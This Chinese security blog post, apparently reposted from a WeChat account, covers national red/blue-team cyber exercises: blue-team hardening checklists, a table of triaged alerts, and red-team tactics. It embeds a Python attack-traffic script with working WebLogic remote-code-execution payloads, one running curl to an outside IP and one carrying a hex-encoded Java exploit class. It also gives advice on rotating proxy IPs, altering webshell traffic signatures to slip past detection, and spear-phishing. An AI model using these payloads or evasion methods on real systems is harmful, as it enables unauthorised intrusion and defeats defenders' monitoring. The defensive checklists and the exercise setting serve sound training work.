前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >攻防演练的热潮发展

攻防演练的热潮发展

作者头像
Gcow安全团队
发布2020-03-06 11:46:46
9950
发布2020-03-06 11:46:46
举报
文章被收录于专栏:Gcow安全团队
《无间道之护网》

领导:你们都在哪护网啊,汇报一下。

同事:对不起,我不能告诉你。

趁今年还没开始,和大家一起学习一下。

当然我们单位也是很严格的,去年因为我刚入职,工位上的一台公共PC与红队IP建立了通信,被怀疑是间谍,整个护网被隔离,所以蓝队的护网中后期基本没有参与。

首先可能还有一些小伙伴还不知道什么是护网,所以我就不解释了,懂的都懂

2020年因为疫情的原因暂时无法猜测,可能会延后。

2019年招聘,日薪从1.5k到无上限,时长为1个月-3个月。

不过主要原因还是国家对网络安全开始重视起来了。

攻击方更不用谈了,要求更高,报酬更高。

薪资高了,这波热潮结束,安全从业人员薪资也涨了很多。

同时看到很多公司从没有安全人员到高薪招聘安全人员,略感欣慰。

但很多专科文凭都没有且技术感人的同学张口期望薪资就是一万一个月,有大概率泡沫经济的可能。

随着安全行业的正式化扩招,未来要求也会越来越严格,扯远了。

蓝方护网

1.护网专项方案

工作内容

优化防火墙策略,使用漏扫进行扫描资产,严禁内外网私接,加强公共区域和办公区域的终端防护,安排人员监控设备,全面梳理内网外网资产、收缩攻击暴露面。

密切注意邮件,U盘,陌生人。办公场所内网电脑严格把控。及时更新应急响应方案,针对公司预警单,确认是否整改。在核心系统部署防护手段,邮箱自查弱口令,敏感信息,及排查外包情况。

安排人员进行渗透及协助网络安全工作,制定攻击方案,对公司各单位的系统模拟攻击。

部署防火墙及waf,IPS或威胁情报分析溯源工具,管理管控工具,部署终端准入设备,并将网络安全设备日志传送到省公司统一日志平台。

建立沟通渠道,发现问题第一时间进行反馈。

利用各类安全监测手段,对潜在的安全攻击事件进行分析,发现APT。

严禁全通、遵循权限最小化、控制白名单。

7×24小时现场值班。

建立与运营商、域名服务商的沟通联动机制。

加强监视,加大对机房、现场的巡检力度。

如何做好防护的一些方案。

2.护网演练

在准备阶段,演练过程中,红队采取脚本构造恶意payload,来测试安全设备的告警及安全监控分析人员的响应能力。

python2脚本如下,代码中的字典就不放出了,可自行构造:

代码语言:javascript
复制
# -*- encoding: utf-8 -*-

import requests
import datetime
import time
import json
import os
from optparse import OptionParser

requests.packages.urllib3.disable_warnings()
requests.adapters.DEFAULT_RETRIES = 0
succes_count = 0
fail_count = 0


def getip():
    r = requests.get('http://ip.360.cn/IPShare/info',verify=False)
    ip = json.loads(r.content)['ip']
    return ip


def geturl(payload):
    global fail_count
    global succes_count
    heads = {
        'User-Agent':
        'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0'
    }
    try:
        requests.get(url + payload, headers=heads, timeout=3,verify=False)
        succes_count += 1
    except:
        fail_count += 1


def attackweblogic():
    global fail_count
    global succes_count
    heads = {
        'User-Agent':
        'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0'
    }
    data = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><object class="java.lang.ProcessBuilder"><array class="java.lang.String" length="3"><void index="0"><string>/bin/sh</string></void><void index="1"><string>-c</string></void><void index="2"><string>curl http://101.200.127.171/sgccccccccc</string></void></array><void method="start"/></object></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>'''
/*
* 提示:该行代码过长,系统自动注释不进行高亮。一键复制会移除系统注释 
* data2 = '''<?xmlversion="1.0"encoding="utf-8"?><soapenv:Envelopexmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"xmlns:wsa="http://www.w3.org/2005/08/addressing"xmlns:asy="http://www.bea.com/async/AsyncResponseService"><soapenv:Header><wsa:Action>fff</wsa:Action><wsa:RelatesTo>hello</wsa:RelatesTo><work:WorkContextxmlns:work="http://bea.com/2004/06/soap/workarea/"><java><string><class><string>org.slf4j.ext.EventData</string><void><string><![CDATA[<java><voidclass="weblogic.utils.Hex"method="fromHexString"id="cls"><string>0xcafebabe0000003301280a004b00870a0088008907008a0a0003008b0a004b008c0a008d008e08008f0a002f00900800910a008d00920a009300940a009300950700960a000d00970a001100980a000d009907009a0a0011009b0a002f009c0a002f009d08009e07009f0a001600870a00a000a10a003f00a20a001600a30800a40a001600a50800a60a002f00a70a00a800a90a002700aa0800ab0a00ac00ad0a002f00ae0800af0700b00a002500870700b10800b20a002700b30a002700b40a002700***800b60a00b700b80800b90700ba0a002f00bb0800bc0a002f00bd0a002f00be0b00bf00c00800c10800c20800c30800c40700c50a003900c60a003900c70a003900c80a00c900ca0800cb0700cc0a003f00b30a003f00cd0a00c900ce0a00cf00d00a00b700d10a00a800d20700d30a004600bb0a00d400d50800d60700d70700d80100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c650100047468697301001e4c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578703b010003736179010015284c6a6176612f6c616e672f537472696e673b29560100056669656c640100194c6a6176612f6c616e672f7265666c6563742f4669656c643b01001568747470436f6e6e656374696f6e48616e646c65720100314c7765626c6f6769632f736572766c65742f696e7465726e616c2f48747470436f6e6e656374696f6e48616e646c65723b01000e736572766c65745265717565737401002e4c7765626c6f6769632f736572766c65742f696e7465726e616c2f536572766c657452657175657374496d706c3b010003636d640100124c6a6176612f6c616e672f537472696e673b01000d6578656375746554687265616401001d4c7765626c6f6769632f776f726b2f457865637574655468726561643b01000f736572766c6574526573706f6e736501002f4c7765626c6f6769632f736572766c65742f696e7465726e616c2f536572766c6574526573706f6e7365496d706c3b01000b776f726b4164617074657201001b4c7765626c6f6769632f776f726b2f576f726b416461707465723b010014776562417070536572766c6574436f6e746578740100304c7765626c6f6769632f736572766c65742f696e7465726e616c2f576562417070536572766c6574436f6e746578743b0100047061746801000769734c696e75780100015a0100056f73547970010004636d64730100104c6a6176612f7574696c2f4c6973743b01000b7072696e745772697465720100154c6a6176612f696f2f5072696e745772697465723b0100057368656c6c0100066465636f64650100025b4201000c5f7072696e7457726974657201000e70726f636573734275696c64657201001a4c6a6176612f6c616e672f50726f636573734275696c6465723b01000470726f630100134c6a6176612f6c616e672f50726f636573733b0100046e616d650100056279746573010006656e636f646501000c7072696e745772697465723101000d537461636b4d61705461626c650700d70700ba07008a0700d90700da0700db0700dc0700b107006f01000a457863657074696f6e730700dd01000a536f7572636546696c6501000***6d6c4578702e6a6176610c004c004d0700de0c00df00e001001b7765626c6f6769632f776f726b2f457865637574655468726561640c00e100e20c00e300e40700e50c00e600e701001c436f6e7461696e6572537570706f727450726f7669646572496d706c0c00e800e9010011636f6e6e656374696f6e48616e646c65720c00ea00eb0700ec0c00ed00ee0c00ef00f001002f7765626c6f6769632f736572766c65742f696e7465726e616c2f48747470436f6e6e656374696f6e48616e646c65720c00f100f20c00f300f40c00f500f601002c7765626c6f6769632f736572766c65742f696e7465726e616c2f536572766c657452657175657374496d706c0c00f700f60c00f800e70c00f900fa01000677686f616d690100176a6176612f6c616e672f537472696e674275696c6465720700db0c00fb00fc0c00fd00e70c00fe00ff0100102f7761722f66617669636f6e2e69636f0c010000e7010010676976656d65776c73776172706174680c010101020700d90c010301040c010500540100076f732e6e616d650701060c010701080c010900e701000377696e0100136a6176612f7574696c2f41727261794c6973740100136a6176612f696f2f5072696e74577269746572010001780c004c00540c010a00540c010b004d0104c45043554b64484a354948734b4943416749434167616d4632595335735957356e4c6c4e30636d6c755a7942755957316c4944306749694937436941674943416749477068646d4575624746755a79355464484a70626d63675932316b49443067636d56786457567a6443356e5a58525159584a68625756305a58496f496d4e745a4349704f776f6749434167494342705a69686a6257513950573531624777704948734b4943416749434167494342766458517563484a70626e5273626967696347786c59584e6c49476c756348563049474e7662573168626d516849696b3743694167494341674948304b436941674943416749474a766232786c5957346761584e58615734675053416f616d463259533570627935476157786c4c6e4e6c6347467959585276636b4e6f59584967505430674a79386e4b53412f49475a6862484e6c49446f6764484a315a54734b4943416749434167616d4632595335735957356e4c6c4e30636d6c755a31746449474a7662335137436941674943416749476c6d494368706331647062696b6765776f67494341674943416749474a7662335167505342755a586367616d4632595335735957356e4c6c4e30636d6c755a31746449487367496d4e745a43356c654755694c4341694c324d694c43426a625751676654734b49434167494341676653426c62484e6c4948734b4943416749434167494342696232393049443067626d563349477068646d4575624746755a79355464484a70626d64625853423749434976596d6c754c324a68633267694c4341694c574d694c43426a625751676654734b494341674943416766516f67494341674943427159585a684c6d7868626d637555484a765932567a63304a316157786b5a58496763474967505342755a586367616d4632595335735957356e4c6c427962324e6c63334e4364576c735a4756794b474a76623351704f776f674943416749434277596935795a575270636d566a64455679636d3979553352795a5746744b485279645755704f776f67494341674943427159585a684c6d7868626d637555484a765932567a63794277494430676347497563335268636e516f4b54734b4943416749434167616d4632595335706279354a626e423164464e30636d56686253427062694139494841755a325630535735776458525464484a6c5957306f4b54734b4943416749434167596e6c305a56746449474a315a6941394947356c647942696558526c577a45774d6a52644f776f674943416749434270626e5167624756754944306761573475636d56685a436869645759704f776f67494341674943423361476c735a53416f6247567549434539494330784b534237436941674943416749434167636d567a63473975633255755a3256305433563063485630553352795a5746744b436b7564334a706447556f596e566d4c4341774c4342735a5734704f776f6749434167494341674947786c6269413949476c754c6e4a6c5957516f596e566d4b54734b494341674943416766516f6749434167494342795a584e776232357a5a53356e5a585250645852776458525464484a6c5957306f4b53356d6248567a614367704f776f67494341676653426a5958526a6143416f5258686a5a58423061573975494755704948734b494341674948304b4a54343d07010c0c006e010d0100042e6a73700100106a6176612f6c616e672f537472696e670c004c010e010004244e4f240c010f01020c011001110700dc0c011201130100092f62696e2f626173680100022d63010007636d642e6578650100022f630100186a6176612f6c616e672f50726f636573734275696c6465720c004c01140c011501160c011701180701190c011a00fa01000d2f7761722f646174612e62696e01000c6a6176612f696f2f46696c650c011b011c0c011d011e07011f0c012001210c007701220c0123012401001c6a6176612f696f2f427974654172726179496e70757453747265616d0701250c0126012701000001001c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578700100106a6176612f6c616e672f4f626a65637401002d7765626c6f6769632f736572766c65742f696e7465726e616c2f536572766c6574526573706f6e7365496d706c0100197765626c6f6769632f776f726b2f576f726b4164617074657201002e7765626c6f6769632f736572766c65742f696e7465726e616c2f576562417070536572766c6574436f6e7465787401000e6a6176612f7574696c2f4c6973740100136a6176612f6c616e672f457863657074696f6e0100106a6176612f6c616e672f54687265616401000d63757272656e7454687265616401001428294c6a6176612f6c616e672f5468726561643b01000e67657443757272656e74576f726b01001d28294c7765626c6f6769632f776f726b2f576f726b416461707465723b010008676574436c61737301001328294c6a6176612f6c616e672f436c6173733b01000f6a6176612f6c616e672f436c6173730100076765744e616d6501001428294c6a6176612f6c616e672f537472696e673b010008636f6e7461696e7301001b284c6a6176612f6c616e672f4368617253657175656e63653b295a0100106765744465636c617265644669656c6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f7265666c6563742f4669656c643b0100176a6176612f6c616e672f7265666c6563742f4669656c6401000d73657441636365737369626c65010004285a2956010003676574010026284c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b010011676574536572766c65745265717565737401003028294c7765626c6f6769632f736572766c65742f696e7465726e616c2f536572766c657452657175657374496d706c3b01000a676574436f6e7465787401003228294c7765626c6f6769632f736572766c65742f696e7465726e616c2f576562417070536572766c6574436f6e746578743b010012676574536572766c6574526573706f6e736501003128294c7765626c6f6769632f736572766c65742f696e7465726e616c2f536572766c6574526573706f6e7365496d706c3b01000b676574526573706f6e73650100047472696d0100066c656e67746801000328294901000e676574526f6f7454656d7044697201001028294c6a6176612f696f2f46696c653b01000f6765744162736f6c75746550617468010006617070656e6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f537472696e674275696c6465723b010008746f537472696e67010010657175616c7349676e6f726543617365010015284c6a6176612f6c616e672f537472696e673b295a01000967657457726974657201001728294c6a6176612f696f2f5072696e745772697465723b01000577726974650100106a6176612f6c616e672f53797374656d01000b67657450726f7065727479010026284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f537472696e673b01000b746f4c6f776572436173650100077072696e746c6e010005636c6f736501001d7765626c6f6769632f736572766c65742f7574696c732f426173653634010016284c6a6176612f6c616e672f537472696e673b295b42010005285b42295601000a73746172747357697468010009737562737472696e670100152849294c6a6176612f6c616e672f537472696e673b010003616464010015284c6a6176612f6c616e672f4f626a6563743b295a010013284c6a6176612f7574696c2f4c6973743b295601001372656469726563744572726f7253747265616d01001d285a294c6a6176612f6c616e672f50726f636573734275696c6465723b010005737461727401001528294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000777616974466f7201000d6372656174654e657746696c6501000328295a01000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b01001d6f72672f6170616368652f636f6d6d6f6e732f696f2f494f5574696c7301000b746f427974654172726179010019284c6a6176612f696f2f496e70757453747265616d3b295b42010016285b42294c6a6176612f6c616e672f537472696e673b010016676574536572766c65744f757470757453747265616d01003528294c7765626c6f6769632f736572766c65742f696e7465726e616c2f536572766c65744f757470757453747265616d496d706c3b0100317765626c6f6769632f736572766c65742f696e7465726e616c2f536572766c65744f757470757453747265616d496d706c01000b777269746553747265616d010018284c6a6176612f696f2f496e70757453747265616d3b29560021004a004b0000000000020001004c004d0001004e0000002f00010001000000052ab70001b100000002004f0000000600010000000b00500000000c0001000000050051005200000001005300540002004e000004640004001400000220b80002c000034d014e2cb600043a04013a051904b60005b600061207b600089900341904b600051209b6000a3a06190604b6000b19061904b6000cc0000d3a071907b6000eb6000f3a051907b600104ea7001f1904c100119900171904c000113a061906b600124e1906b6000f3a052bc6000d2bb60013b600149a000612154cbb001659b700171905b60018b60019b6001a121bb6001ab6001c3a062b121db6001e99000d2db6001f1906b60020b10436071221b800223a081908c600131908b600231224b60008990006033607bb002559b700263a09bb002759bb001659b700171906b6001a1228b6001ab6001cb700293a0a190a1906b6002a190ab6002b122c3a0b190bb8002d3a0cbb002759bb001659b700171906b6001a122eb6001ab6001cb700293a0d190dbb002f59190cb70030b6002a190db6002b2b1231b6003299001319092b07b60033b90034020057a70045150799002319091235b9003402005719091236b9003402005719092bb90034020057a7002019091237b9003402005719091238b9003402005719092bb90034020057bb0039591909b7003a3a0e190e04b6003b57190eb6003c3a0f190fb6003d57bb001659b700171905b60018b60019b6001a123eb6001ab6001c3a10bb003f591910b70040b6004157190fb60042b800433a111911b800443a12bb0027591910b700293a1319131912b6002a1913b6002b2db60045bb0046591911b70047b600482db6001f1249b60020b100000003004f000000e20038000000100007001100090012000f00130012001400220015002e00160034001700400018004a00190050001a005b001b0062001c0068001d006f0020007d002100800024009c002600a5002700ae002800af002c00b2002d00b9002e00cb002f00ce003200d7003400f4003500fb00360100003801040039010b003b0128003c0136003d013b003f01440040015400410159004201630043016d00440179004601830047018d00480196004c01a1004d01a8004e01af004f01***05f01d1006001de006201e8006401ef006501fa0066020100670206007302160074021f00760050000000e80017002e0022005500560006004000100057005800070062000d0059005a00060000022000510052000000000220005b005c000100070219005d005e000200090217005f00600003000f02110061006200040012020e006300640005009c01840065005c000600b2016e00660067000700b901670068005c000800d701490069006a000900f4012c006b006c000a0104011c006d005c000b010b0115006e006f000c012800f80070006c000d01a1007f00710072000e01af007100730074000f01d1004f0075005c001001e800380076006f001101ef00310077005c001201fa00260078006c001300790000005c0009ff0053000607007a07007b07007c07007d07007e07007f00001b0d02fc002e07007bfd001e0107007bff0085000e07007a07007b07007c07007d07007e07007f07007b0107007b07008007008107007b0700820700810000241c0083000000040001008400010085000000020086</string></void><voidclass="org.mozilla.classfile.DefiningClassLoader"><voidmethod="defineClass"><string>com.supeream.exploits.XmlExp</string><objectidref="cls"></object><voidmethod="newInstance"><voidmethod="say"id="proc"><string>whoami</string></void></void></void></void></java>]]></string></void></class></string></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>'''
*/
    try:
        requests.post(url + "/wls-wsat/CoordinatorPortType11",
                      headers=heads,
                      data=data,verify=False)
        succes_count += 1
        requests.post(url + "/_async/AsyncResponseService",
                      headers=heads,
                      data=data2,verify=False)
        succes_count += 1
    except Exception, e:
        print e.message
        fail_count += 1


def attack():
    if ltype == 'weblogic':
        while 1:
            if (datetime.datetime.now() - start_time).seconds > int(ltime):
                break
            else:
                attackweblogic()
    else:
        while 1:
            if (datetime.datetime.now() - start_time).seconds > int(ltime):
                break
            else:
                for payload in payloads:
                    if (datetime.datetime.now() -
                            start_time).seconds < int(ltime):
                        geturl(payload)
                    else:
                        break


def main():
    usage = "usage: %prog [options] args"
    parser = OptionParser(usage)
    parser.add_option("--url",
                      dest='url',
                      help=u"攻击对象,eg:http://192.168.111.1",
                      default=180)
    parser.add_option("--time",
                      dest='time',
                      help=u"攻击时间,单位:秒,默认180s",
                      default=180)
    parser.add_option("--type",
                      dest='type',
                      help=u"攻击类型,可选参数:sqlinject、struts2、dirscan、xss、weblogic")

    (options, args) = parser.parse_args()

    global url, ltype, ltime, payloads, start_time
    if not options.type or not options.url:
        parser.print_help()
        print '\nexample:python Main.py --url http://www.sh.sgcc.com.cn --type dirscan --time 10'
        exit()

    else:
        url = options.url
        ltype = options.type
        ltime = options.time
        start_time = datetime.datetime.now()
        pstart_time = start_time.strftime('%Y-%m-%d %H:%M:%S')

    file = './dict/' + ltype + '.dict'
    if not os.path.exists(file):
        print u'请检查攻击类型是否正确!'
        exit()
    payloads = open(file).readlines()
    print u'出口地址:' + getip()
    print u'目标地址:' + url
    print u'攻击类型:' + ltype
    print u'设定时长:' + ltime + 's'
    print u'开始时间:' + pstart_time
    attack()
    print u'结束时间:' + datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
    print u'成功次数:', succes_count
    print u'失败次数:', fail_count


if __name__ == "__main__":
    main()

预警类型

研判后的攻击类型

扫描目的IP数:88979扫描目的端口:445

感染病毒

扫描目的IP数:7418扫描目的端口:2425端口

扫描目的IP:10.70.4.* 扫描目的端口数:65535

SQL注入

SQL注入

远程代码执行

误报

扫描器

误报

web服务远程跨站脚本执行

误报

服务器信息泄露

目录探测

代码/命令执行

代码执行

针对IIS解析漏洞的检测

解析漏洞

代码/命令执行

命令执行

脚本木马

脚本木马

Web服务器漏洞攻击

SQL注入

SQL注入

代码执行

植入可疑文件

误报

扫描目的端口数:1355

危险脚本上传

误报

路径探测

路径探测、代码执行

Web插件漏洞攻击

SQL注入

恶意扫描

误报

危险脚本上传

代码执行/恶意探测

僵尸网络木马

误报

SQL注入

SQL注入

代码/命令执行

代码执行

XML攻击扫描

误报

Web插件漏洞攻击

代码执行

命令注入攻击

代码执行

应用漏洞攻击

struts2-045远程代码执行

Web插件漏洞攻击

Web插件漏洞攻击

代码执行

代码执行

应用漏洞攻击

代码执行

SQL注入

SQL注入

植入可疑文件

误报

植入可疑文件

误报

服务器信息泄露

误报

植入可疑文件

误报

XML攻击

误报

SQL注入

SQL注入

应用漏洞攻击

命令执行

僵尸网络木马

误报

脚本木马

目录探测

代码/命令执行

命令执行

应用漏洞攻击

struts2漏洞攻击

代码执行

代码执行

脚本木马

目录探测

SQL注入

SQL注入

代码执行

命令执行

代码执行

命令执行

危险脚本上传

SQL注入、代码执行

HTTP协议违背

SQL注入

代码执行

代码执行

Web插件漏洞攻击

代码执行

服务器信息泄露

误报

应用漏洞攻击

代码执行

应用漏洞攻击

struts2漏洞攻击

远程代码执行

代码执行

应用漏洞攻击

代码执行

Web插件漏洞攻击

代码执行

敏感信息过滤

误报

命令注入

代码执行

扫描目的IP数:3948,扫描目的端口数:13664

【恶意软件】僵尸网络

确认感染病毒

【恶意软件】远控木马

误报

服务器信息泄露

信息泄露

【恶意软件】远控木马

确认感染病毒

远程控制类木马

误报

脚本木马

代码执行

SQL注入

代码执行

SQL注入

SQL注入

Web插件漏洞攻击

SQL注入,struts2漏洞攻击

应用漏洞攻击

代码执行

【恶意软件】远控木马

感染病毒

【恶意软件】远控木马

误报

【恶意软件】远控木马

误报

跨站攻击

误报

路径穿越攻击

目录探测

Web插件漏洞攻击

代码执行

代码执行

代码执行

服务器信息泄露

目录探测

目录遍历

误报

应用漏洞攻击

代码执行

代码执行

代码执行

应用漏洞攻击

代码执行

HTTP访问控制事件

文件上传

HTTP访问控制事件

文件上传

HTTP访问控制事件

文件上传

跨站脚本攻击(XSS)

误报

非法下载

非法下载

恶意攻击

目录探测

恶意攻击

目录探测

植入后门文件

文件上传

SQL注入

误报

跨站脚本攻击(XSS)

文件上传

跨站脚本攻击(XSS)

代码执行

跨站攻击

代码执行

Web插件漏洞攻击

代码执行

代码执行

代码执行

HTTP访问控制事件

文件上传

服务器信息泄露

误报

服务器信息泄露

误报

危险脚本上传

误报

代码执行

代码执行

Web插件漏洞攻击

代码执行

HTTP访问控制事件

协议探测

HTTP访问控制事件

文件上传

代码执行

代码执行

应用漏洞攻击

struts2漏洞攻击

脚本木马

代码执行

恶意攻击

误报

Web插件漏洞攻击

代码执行

Web插件漏洞攻击

Struts2漏洞攻击

应用漏洞攻击

struts2漏洞攻击

代码执行

代码执行

文件非法上传

误报

SQL注入

误报

植入后门文件

误报

HTTP协议违背

SQL注入

服务器信息泄露

误报

代码执行

代码执行

跨站脚本攻击

误报

OpenSSL缓冲区溢出漏洞

OpenSSL缓冲区溢出漏洞

HTTP访问控制事件

协议探测

代码执行

代码执行

Web插件漏洞攻击

代码执行

应用漏洞攻击

代码执行

跨站脚本攻击(XSS)

误报

SQL注入

SQL注入

代码执行

代码执行

【恶意软件】网络蠕虫

确认感染病毒

Web插件漏洞攻击

代码执行

服务器信息泄露

误报

命令注入攻击

代码执行

Web插件漏洞攻击

代码执行

SQL注入

误报

Web插件漏洞攻击

代码执行

Web插件漏洞攻击

struts2漏洞攻击

【恶意软件】网络蠕虫

确认感染网络蠕虫

SQL注入攻击

代码执行

扫描目的IP数:217626扫描目的端口数:12 主要访问端口:445端口

注入攻击

代码执行

非法下载

目录探测

应用漏洞攻击

代码执行

扫描目的IP数:4978扫描目的端口数:1527

【恶意软件】网络蠕虫

确认感染

代码执行

代码执行

Web插件漏洞攻击

代码执行

Web插件漏洞攻击

代码执行

服务器信息泄露

目录探测

Web插件漏洞攻击

代码执行

HTTP访问控制事件

文件上传

Web插件漏洞攻击

代码执行

Web插件漏洞攻击

代码执行

应用漏洞攻击

struts2漏洞攻击

Web插件漏洞攻击

sql注入

应用漏洞攻击

代码执行

Web插件漏洞攻击

Struts2漏洞攻击

Web插件漏洞攻击

sql注入

扫描目的IP数:3897扫描目的端口数:129

扫描目的IP数:2280 扫描目的端口数:128

应用漏洞攻击

代码执行

危险脚本上传

文件上传

HTTP访问控制事件

文件上传

应用漏洞攻击

代码执行

针对tomcat的暴力破解

暴力破解

HTTP访问控制事件

目录探测

Web插件漏洞攻击

sql注入

代码执行

代码执行

服务器信息泄露

忽略

Web插件漏洞攻击

代码执行

SQL注入攻击

代码执行

令注入攻击

代码执行

文件非法上传

文件上传

Web插件漏洞攻击

代码执行

HTTP访问控制事件

非法文件上传

SQL注入攻击

代码执行

命令注入攻击

目录探测,代码执行

脚本木马

目录探测

脚本木马

目录探测

脚本木马

目录探测

Web插件漏洞攻击

代码执行

代码执行

struts2漏洞攻击

从上面的表格中可以看到,安全设备中会存在误报和误判,需要分析人员分析相关数据包来做出最后的判断及根据业务优化相关策略。

3.检查项

那么蓝方还要做什么呢?


摸清自己底细"横向到边纵向到底" 。

敏感信息排查信息,包括代码方案,收集要全方面,在线资产,远程安全督察,绘制布防图设备,网络边界末梢口。

加强本质,安全自查整改自建终端防火墙规则,督察检查闭环,安全宣传教育,供应商安全。

严防护,纵深防御,攻击捕获,重点防护泛终端打印机dvr门禁和统一口令集控系统dns域控堡垒机,全监控,值班值守,检测分析,应急处置,联动协同,追根溯源。

具体实施项如下:

(1)护网目标系统是否与单位其他网段网络隔离

(2)服务器、网络设备、安全设备运维方式确认,是否为堡垒机,如果直接运维,建议护网期间,只允许运维人员网络访问SSH、RDP等。

(3)核心系统安全策略确认,建议护网期间配置更严格的ACL策略。

(4)终端杀毒软件保证护网前期和护网期间每天进行病毒查杀。

(5)口令安全,网络设备、安全设备口令设置为强口令,不能统一口令,业务系统是否对外部用户开启注册。若提供外部用户注册,是否对外部用户注册时口令复杂度及长度进行强制要求。是否有密码找回功能。

(6)应用系统后台地址暴露情况,是否对公网暴露。

(7)网站上传目录是否有运行权限。

(8)V**、服务器账号是否有长期不用的测试账号、临时账号等。

(9)监控设备如流量分析、态势感知设备流量接入是否全部覆盖单位互联网网络,尤其容易疏忽的是第三方接入流量。

(10)安全设备如WAF、IPS可以根据网络情况,安全策略级别调高,如访问频率阀值,封堵时间等。

(11)前期发现的漏洞,高危利用难度低的漏洞优先修复。

红方护网

在真实的攻击行动中,给攻击方的时间只有几周,每个队伍多多个目标,决定了攻击者需要快速编写脚本实现自动化。

1.扫描

扫描器,大家的第一反应,当然还是DIY的更香。分布式扫描器的搭建网上有很多教程,主要目的是**多个服务器来保持扫描器的稳定及效率。因为有蓝方的存在,一旦被发现攻击IP,IP被立马被他们防火墙ban掉,直接无法进行正常访问,我的一个红方朋友跟我说某安服厂商推出了一个平台,提供了大量的IP自动切换。你ban我一个,我换一个。

当然没有厂家的支持,可以自己搞。花钱购买稳定的代理池,提取代理IP,进行切换。某服务提供商的价格如下。

2.攻击软件的特征

众所周知,攻击方用的工具,防守方也有,所以大多数监控设备都会提取攻击方的特征值,去匹配恶意攻击流量,来实施拦截防护。

如菜刀,CS,MSF,基本都被秒杀。

有脑子的人,要么DIYwebshell管理器,要么都转用加密传输的冰蝎了。

最简单的应对方式就是修改特征流量。

同时我们要知道!!!

“无文件”攻击已经成为主流。

3.鱼叉攻击

也就是直接给蓝队发钓鱼邮件。

有兴趣的参考红队行动之鱼叉攻击-研究分享。

https://payloads.online/archivers/2020-02-05/1

4.0day AND Nday

最有效的当然是oday了。

2019年的0day整理,转自key。

护网0day细节文档下载:

https://files.zsxq.com/lnRfvJkB7GIG6AYTzZL41NeTyqbj?attname=HW2019-0day%E7%BB%86%E8%8A%82%E6%80%BB%E7%BB%93.pdf&e=1582682331&token=kIxbL07-8jAj8w1n4s9zv64FuZZNEATmlU_Vm6zD:gm48qTTryo4YapNkVfV2gNHEgfs=

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2020-02-27,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 Gcow安全团队 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 蓝方护网
    • 1.护网专项方案
      • 2.护网演练
        • 3.检查项
        • 红方护网
          • 1.扫描
            • 2.攻击软件的特征
              • 3.鱼叉攻击
                • 4.0day AND Nday
                相关产品与服务
                运维安全中心(堡垒机)
                腾讯云运维安全中心(堡垒机)(Operation and Maintenance Security Center (Bastion Host))可为您的 IT 资产提供代理访问以及智能操作审计服务,为客户构建一套完善的事前预防、事中监控、事后审计安全管理体系,助力企业顺利通过等保测评。
                领券
                问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档